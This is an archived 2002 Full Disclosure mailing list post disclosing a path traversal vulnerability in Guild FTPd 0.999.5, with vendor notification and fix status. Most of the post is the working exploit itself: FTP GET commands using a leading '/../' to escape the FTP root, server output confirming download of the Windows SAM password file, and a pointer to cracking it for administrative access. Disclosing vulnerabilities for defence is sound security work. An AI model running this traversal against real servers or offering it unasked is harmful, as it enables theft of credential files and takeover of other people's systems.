Full Disclosure mailing list archives
Guild FTPd Exploit
From: full-disclosure () mike-c com (Mike C)
Date: Mon, 9 Sep 2002 02:54:21 +0100
______________________________________________________________________ Product Information Guild FTPd 0.999.5 Released 4th July 2002 http://www.nitrolic.com Guild FTPd is an ftp server which is growing ever more popular due to its link with IRC. It can detect if the people on your FTP are in in the same channels you are, and kick/ban them accordingly. This is useful if you wish to keep your ftp data a little more private. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ____________________________________________________________ Exploit Information Author: Mike C Date: 7th September 2002 Description: Using a simple exploit in Guild FTPd, we can download any file on the same hard drive as the ftp root folder. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ __________________________________________________ SAM SECURITY FILE LOCAL PATH = C:\windows\repair\sam FTP ROOT = C:\ftp RELATIVE PATH = ../windows/repair/sam ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ 1) We try to download the sam file using a relative path to the ftp root ftp> GET "../windows/repair/sam" c:\sam 200 PORT command successful. 150 Opening ascii mode data connection for /../windows/repair/sam (24576 bytes). 425 Download failed. ftp> 2) We get a 'Download failed' message, along with a filesize, confirming the file exists. If the file doesn't exist, we get 'Access denied: File not found.' 3) Adding a / to the start of the relative path seems to bypass the server's security relating to relative URLs. Note however, that / doesn't escape the ftp root as you may except. Where '../foo.bar' is not accessible, '/../foo.bar' is. ftp> GET "/../windows/repair/sam" c:\sam 200 PORT command successful. 150 Opening ascii mode data connection for /../windows/repair/sam (24576 bytes). 226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s). ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec. ftp> 4) We have just successfully exploited the server, managing to download the system's sam file. An application such as l0phtcrack (http://www.atstake.com/research/lc/) could now be used to find the passwords, thus giving full administrative access to the exploited system. ______________________________________________________________________ Vendor Status: The authors of Guild FTPd were notified on 7th September 2002. The exploit has been fixed as of 8th September 2002. A new version will be released on 15th September 2002. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Current thread:
- Guild FTPd Exploit Mike C (Sep 08)